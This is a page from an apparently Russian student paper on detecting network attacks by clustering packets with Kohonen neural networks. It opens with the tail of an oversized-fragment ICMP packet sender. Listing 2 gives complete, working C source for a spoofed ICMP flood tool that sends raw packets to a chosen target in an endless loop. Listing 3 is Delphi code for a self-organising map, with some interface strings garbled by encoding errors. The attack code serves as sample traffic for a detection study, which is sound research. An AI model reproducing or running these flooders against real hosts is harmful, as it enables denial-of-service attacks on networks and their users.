Смекни!
smekni.com

Кластеризация групп входящих пакетов с помощью нейронных сетей конкурирующего типа (стр. 6 из 7)

else

ip->ip_len = FIX(418); /* make total 65538 */

if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,

sizeof dst) < 0) {

fprintf(stderr, "offset %d: ", offset);

perror("sendto");

}

if (offset == 0) {

icmp->icmp_type = 0;

icmp->icmp_code = 0;

icmp->icmp_cksum = 0;

}

}

}

Листинг 2. Атака лавинного типа подменёнными ICMP – пакетами.

#include <sys/types.h>

#include <sys/socket.h>

#include <stdio.h>

#include <unistd.h>

#include <stdlib.h>

#include <string.h>

#include <netdb.h>

#include <netinet/ip.h>

#include <netinet/in.h>

#include <netinet/ip_icmp.h>

#define IPHDRSIZE sizeof(struct iphdr)

#define ICMPHDRSIZE sizeof(struct icmphdr)

#define VIRGIN "1.1"

void version(void) {

printf("flood %s - by FA-Q&bsol;n", VIRGIN);

}

void usage(const char *progname)

{

printf("usage: %s [-fV] [-c count] [-i wait] [-s packetsize] <target> <broadcast>&bsol;n",progname);

}

unsigned char *dest_name;

unsigned char *spoof_name = NULL;

struct sockaddr_in destaddr, spoofaddr;

unsigned long dest_addr;

unsigned long spoof_addr;

unsigned pingsize, pingsleep, pingnmbr;

char flood = 0;

unsigned short in_cksum(addr, len)

u_short *addr;

int len;

{

register int nleft = len;

register u_short *w = addr;

register int sum = 0;

u_short answer = 0;

while (nleft > 1) {

sum += *w++;

nleft -= 2;

}

if (nleft == 1) {

*(u_char *)(&answer) = *(u_char *)w;

sum += answer;

}

sum = (sum >> 16) + (sum & 0xffff);

sum += (sum >> 16);

answer = ~sum;

return(answer);

}

int resolve( const char *name, struct sockaddr_in *addr, int port )

{

struct hostent *host;

bzero((char *)addr,sizeof(struct sockaddr_in));

if (( host = gethostbyname(name) ) == NULL ) {

fprintf(stderr,"%s will not resolve&bsol;n",name);

perror(""); return -1;

}

addr->sin_family = host->h_addrtype;

memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);

addr->sin_port = htons(port);

return 0;

}

unsigned long addr_to_ulong(struct sockaddr_in *addr)

{

return addr->sin_addr.s_addr;

}

int resolve_one(const char *name, unsigned long *addr, const char *desc)

{

struct sockaddr_in tempaddr;

if (resolve(name, &tempaddr,0) == -1) {

printf("%s will not resolve&bsol;n",desc);

return -1;

}

*addr = tempaddr.sin_addr.s_addr;

return 0;

}

int resolve_all(const char *dest,

const char *spoof)

{

if (resolve_one(dest,&dest_addr,"dest address")) return -1;

if (spoof!=NULL)

if (resolve_one(spoof,&spoof_addr,"spoof address")) return -1;

spoofaddr.sin_addr.s_addr = spoof_addr;

spoofaddr.sin_family = AF_INET;

destaddr.sin_addr.s_addr = dest_addr;

destaddr.sin_family = AF_INET;

}

void give_info(void)

{

printf("&bsol;nattacking (%s) from (%s)&bsol;n",inet_ntoa(spoof_addr),dest_name);

}

int parse_args(int argc, char *argv[])

{

int opt;

char *endptr;

while ((opt=getopt(argc, argv, "fc:s:i:V")) != -1) {

switch(opt) {

case 'f': flood = 1; break;

case 'c': pingnmbr = strtoul(optarg,&endptr,10);

if (*endptr != '&bsol;0') {

printf("%s is an invalid number '%s'.&bsol;n", argv[0], optarg);

return -1;

}

break;

case 's': pingsize = strtoul(optarg,&endptr,10);

if (*endptr != '&bsol;0') {

printf("%s is a bad packet size '%s'&bsol;n", argv[0], optarg);

return -1;

}

break;

case 'i': pingsleep = strtoul(optarg,&endptr,10);

if (*endptr != '&bsol;0') {

printf("%s is a bad wait time '%s'&bsol;n", argv[0], optarg);

return -1;

}

break;

case 'V': version(); break;

case '?':

case ':': return -1; break;

}

}

if (optind > argc-2) {

return -1;

}

if (!pingsize)

pingsize = 28;

else

pingsize = pingsize - 36;

if (!pingsleep)

pingsleep = 100;

spoof_name = argv[optind++];

dest_name = argv[optind++];

return 0;

}

inline int icmp_echo_send(int socket,

unsigned long spoof_addr,

unsigned long t_addr,

unsigned pingsize)

{

unsigned char packet[5122];

struct iphdr *ip;

struct icmphdr *icmp;

struct iphdr *origip;

unsigned char *data;

int i;

ip = (struct iphdr *)packet;

icmp = (struct icmphdr *)(packet+IPHDRSIZE);

origip = (struct iphdr *)(packet+IPHDRSIZE+ICMPHDRSIZE);

data = (char *)(packet+pingsize+IPHDRSIZE+IPHDRSIZE+ICMPHDRSIZE);

memset(packet, 0, 5122);

ip->version = 4;

ip->ihl = 5;

ip->ttl = 255-random()%15;

ip->protocol = IPPROTO_ICMP;

ip->tot_len = htons(pingsize + IPHDRSIZE + ICMPHDRSIZE + IPHDRSIZE + 8);

bcopy((char *)&destaddr.sin_addr, &ip->daddr, sizeof(ip->daddr));

bcopy((char *)&spoofaddr.sin_addr, &ip->saddr, sizeof(ip->saddr));

ip->check = in_cksum(packet,IPHDRSIZE);

origip->version = 4;

origip->ihl = 5;

origip->ttl = ip->ttl - random()%15;

origip->protocol = IPPROTO_TCP;

origip->tot_len = IPHDRSIZE + 30;

origip->id = random()%69;

bcopy((char *)&destaddr.sin_addr, &origip->saddr, sizeof(origip->saddr));

origip->check = in_cksum(origip,IPHDRSIZE);

*((unsigned int *)data) = htons(pingsize);

icmp->type = 8; /* why should this be 3? */

icmp->code = 0;

icmp->checksum = in_cksum(icmp,pingsize+ICMPHDRSIZE+IPHDRSIZE+8);

return sendto(socket,packet,pingsize+IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE+8,0,

(struct sockaddr *)&destaddr,sizeof(struct sockaddr));

}

void main(int argc, char *argv[])

{

int s, i;

int floodloop;

if (parse_args(argc,argv))

{

usage(argv[0]);

return;

}

resolve_all(dest_name, spoof_name);

give_info();

s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

if (!flood)

{

if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1)

{

printf("%s error sending packet&bsol;n",argv[0]); perror(""); return;

}

}

else

{

floodloop = 0;

if ( pingnmbr && (pingnmbr > 0) )

{

printf("sending... packet limit set&bsol;n");

for (i=0;i<pingnmbr;i++)

{

if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1)

{

printf("%s error sending packet&bsol;n",argv[0]); perror(""); return;

}

usleep((pingsleep*1000));

if (!(floodloop = (floodloop+1)%25))

{ fprintf(stdout,"."); fflush(stdout);

}

}

printf("&bsol;ncomplete, %u packets sent&bsol;n", pingnmbr);

}

else {

printf("flooding, (. == 25 packets)&bsol;n");

for (i=0;i<1;i)

{

if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1)

{

printf("%s error sending packet&bsol;n",argv[0]); perror(""); return;

}

usleep(900);

if (!(floodloop = (floodloop+1)%25))

{ fprintf(stdout,"."); fflush(stdout);

}

}

}

}

}

Листинг 3. Самоорганизующаяся карта признаков.

TNeuron = class

public

IntVal : TIntArray;

ExtVal : TExtArray;

Pos : Extended;

Status : Extended;

Y : Extended;

MassWeight : Array of Extended;

constructor Init(a : PIntArray; b : PExtArray);

function FunctionActivation : Extended;

procedure GetAksonValue(a : PExtArray);

procedure Randomization;

procedure Distantion(a : PExtArray);

end;

TLayer = class

public

ExtArr : TExtArray;

Neurons : Array of TNeuron;

QNeurons : integer;

QInputs : integer;

InputValues : Array of Extended;

OutputValues : Array of Extended;

constructor Init(a : PIntArray; b : PExtArray);

procedure GetInputValues(Values : PExtArray);

procedure GetOutputValues;

procedure Excitement;

procedure randomization;

end;

TKohonenLayer = class(TLayer)

public

eta,sigma : Extended;

h,w : Word;

constructor Init(a : PIntArray; b : PExtArray);

procedure Normalize;

function TheWinnerTakesItAll : integer;

function Classic : integer;

procedure Learning(a : integer; SpeedLearn : Extended);

procedure LearningNeib(a : integer; SpeedLearn : Extended);

procedure SigmaInit(s : Extended);

procedure ConvexCombination(delta : Extended);

procedure NeuralGaz(SpeedLearn : Extended);

end;

procedure TKohonenLayer.SigmaInit(s : Extended);

begin

Sigma:=s;

end;

procedure TKohonenLayer.ConvexCombination(delta : Extended);

var i : integer;

begin

eta:=eta+delta;

sigma:=sigma+0.1-10*delta;

for i:=0 to QInputs-1 do InputValues[i]:=InputValues[i]*eta+(1-eta)/sqrt(QInputs);

end;

constructor TKohonenLayer.Init(a : PIntArray; b : PExtArray);

var i : integer;

New : TIntArray;

begin

Inherited Init(a,b);

New:=a^;

H:=New.Value[3];

W:=Round(New.Value[2]/New.Value[3]);

Randomization;

for i:=0 to New.Value[2]-1 do Neurons[i].Pos:=3.75;

eta:=0;

end;

procedure TKohonenLayer.Normalize;

var i : integer;

Sum : Extended;

begin

Sum:=0;

for i:=0 to QInputs-1 do Sum:=Sum+Sqr(InputValues[i]);

for i:=0 to QInputs-1 do

InputValues[i]:=InputValues[i]/Sqrt(Sum);

end;

function TKohonenLayer.TheWinnerTakesItAll : integer;

var i,p : integer;

Min : Extended;

begin

Min:=Neurons[0].Y;

p:=0;

for i:=1 to QNeurons-1 do

begin

if Neurons[i].Pos>0.75 then

if Min>Neurons[i].Y then

begin

p:=i;

Min:=Neurons[i].Y;

end;

end;

for i:=0 to QNeurons-1 do Neurons[i].Y:=0;

for i:=0 to QNeurons-1 do

if i=p then Neurons[i].Pos:=Neurons[i].Pos-0.75

else Neurons[i].Pos:=Neurons[i].Pos+1/QNeurons;

Neurons[p].Y:=1;

GetOutputValues;

TheWinnerTakesItAll:=p;

end;

function TKohonenLayer.Classic : integer;

var i,p : integer;

Min : Extended;

begin

Min:=Neurons[0].Y;

p:=0;

for i:=1 to QNeurons-1 do

begin

if Min>Neurons[i].Y then

begin

p:=i;

Min:=Neurons[i].Y;

end;

end;

for i:=0 to QNeurons-1 do Neurons[i].Y:=0;

Neurons[p].Y:=1;

GetOutputValues;

Classic:=p;

end;

procedure TKohonenLayer.Learning(a : integer; SpeedLearn : Extended);

var i : integer;

begin

for i:=1 to QInputs do

Neurons[a].MassWeight[i]:=Neurons[a].MassWeight[i]+

SpeedLearn*(InputValues[i-1]-Neurons[a].MassWeight[i]);

end;

procedure TKohonenLayer.LearningNeib(a : integer; SpeedLearn : Extended);

var i,j : integer;

begin

for j:=0 to QNeurons-1 do

begin

for i:=1 to QInputs do

Neurons[j].MassWeight[i]:=Neurons[j].MassWeight[i]+

exp(-(Sqr((j div w)-(a div w)) + Sqr((j mod h)-(a mod h)))/(2*Sqr(sigma)))

*SpeedLearn*(InputValues[i-1]-Neurons[j].MassWeight[i]);

end;

end;

procedure TKohonenLayer.NeuralGaz(SpeedLearn : Extended);

var i,j,k,p : integer;

Mass : Array of Extended;

Min : Extended;

begin

SetLength(Mass,QNeurons);

for i:=0 to QNeurons-1 do Mass[i]:=-1;

p:=0;

for i:=0 to QNeurons-1 do

begin

p:=p+1;

Min:=999999;

k:=-1;

for j:=0 to QNeurons-1 do

begin

if Neurons[j].Y<Min then

if Mass[j]=-1 then

begin

k:=j;

Min:=Neurons[j].Y;

end;

end;

Mass[k]:=p;

end;

for j:=0 to QNeurons-1 do

begin

for i:=1 to QInputs do

Neurons[j].MassWeight[i]:=Neurons[j].MassWeight[i]+

exp(-Mass[j]/Sigma)*SpeedLearn*(InputValues[i-1]-Neurons[j].MassWeight[i]);

end;

end;

constructor TNeuron.Init(a : PIntArray; b : PExtArray);

var

New : TIntArray;

begin

New:=a^;

ExtVal:=b^;

IntVal:=TIntArray.Init(2);

IntVal.Value[0]:=New.Value[0]+1;

IntVal.Value[1]:=New.Value[1];

SetLength(MassWeight,IntVal.Value[0]);

if IntVal.Value[0]>0 then MassWeight[0]:=0;

Status:=0;

Y:=0;

Pos:=0;

end;

procedure TNeuron.GetAksonValue(a : PExtArray);

var

i : integer;

b : TExtArray;

begin

b:=a^;

Status:=MassWeight[0];

for i:=1 to IntVal.Value[0]-1 do Status:=Status+MassWeight[i]*b.Value[i-1];

Y:=FunctionActivation;

end;

procedure TNeuron.Distantion(a : PExtArray);

var i : integer;

b : TExtArray;

begin

b:=a^;

Status:=0;

for i:=1 to IntVal.Value[0]-1 do Y:=Y+Sqr(MassWeight[i]-b.Value[i-1]);

Y:=Sqrt(Y);

end;

function TNeuron.FunctionActivation : Extended;

Var m : Extended;

begin

case IntVal.Value[1] of

1 : m:=1/(1+exp(-ExtVal.Value[0]*Status));

2 : m:=ExtVal.Value[0]*Status;

end;

FunctionActivation:=m;

end;

procedure TNeuron.Randomization;

var i : integer;

begin

for i:=0 to IntVal.Value[0]-1 do MassWeight[i]:=random(255);

end;

constructor TLayer.Init(a : PIntArray; b : PExtArray);

var i : integer;

//c : TIntArray;

IntArr : TIntArray;

begin

IntArr:=a^;

QInputs:=IntArr.Value[0];

QNeurons:=IntArr.Value[2];

IntArr.NewLength(2);

ExtArr:=b^;

SetLength(Neurons,SizeOf(TNeuron)*QNeurons);

for i:=0 to QNeurons-1 do Neurons[i]:=TNeuron.Init(@IntArr,b);

SetLength(InputValues,QInputs);

for i:=0 to QInputs-1 do InputValues[i]:=0;

SetLength(OutputValues,QNeurons);

end;

procedure TLayer.GetInputValues(Values : PExtArray);

var i : integer;

a : TExtArray;

begin

a:=Values^;

for i:=0 to QInputs-1 do InputValues[i]:=a.Value[i];

end;

procedure TLayer.Excitement;

var i : integer;

a : TExtArray;

begin

a:=TExtArray.Init(QInputs);

for i:=0 to QInputs-1 do a.Value[i]:=InputValues[i];

for i:=0 to QNeurons-1 do Neurons[i].Distantion(@a);//GetAksonValue(@a);

GetOutputValues;

end;

procedure TLayer.GetOutputValues;

var i : integer;

begin

for i:=0 to QNeurons-1 do OutputValues[i]:=Neurons[i].Y;

end;

procedure TLayer.randomization;

var i : integer;

begin

for i:=0 to QNeurons-1 do Neurons[i].Randomization;

end;

procedure TForm1.Button2Click(Sender: TObject);

var

F : TextFile;

i,j,p,s1,s2,k : integer;

Str : String;

Ch : Char;

Sum : integer;

Temp : Array of String;

begin

OpenDialog1.Filter:='Æóðíàëüíûé ôàéë|*.log|';

if (OpenDialog1.Execute) and fileExists(OpenDialog1.FileName) then

begin

AssignFile(F,OpenDialog1.FileName);

Reset(F);

ReadLn(F);

Read(F,Q);

SetLength(Prot,Q);

SetLength(Host,Q);

SetLength(LocalH,Q);

SetLength(Frag,Q);

SetLength(Size,Q);

SetLength(Proc,Q);

SetLength(Active,Q);

SetLength(HACK,Q);

MyList.Clear;

MyList.Add('Íîìåð');

MyList.Add('Ïðîòîêîë');

MyList.Add('Õîñò');

MyList.Add('Ñâîÿ ËÂÑ');

MyList.Add('Ôðàãìåíòàöèÿ');

MyList.Add('Ðàçìåð');

MyList.Add('Ïðîöåññîð %%');

MyList.Add('Îòâå÷àåò');

StringGrid1.RowCount:=Q+1;

StringGrid1.Rows[0]:=MyList;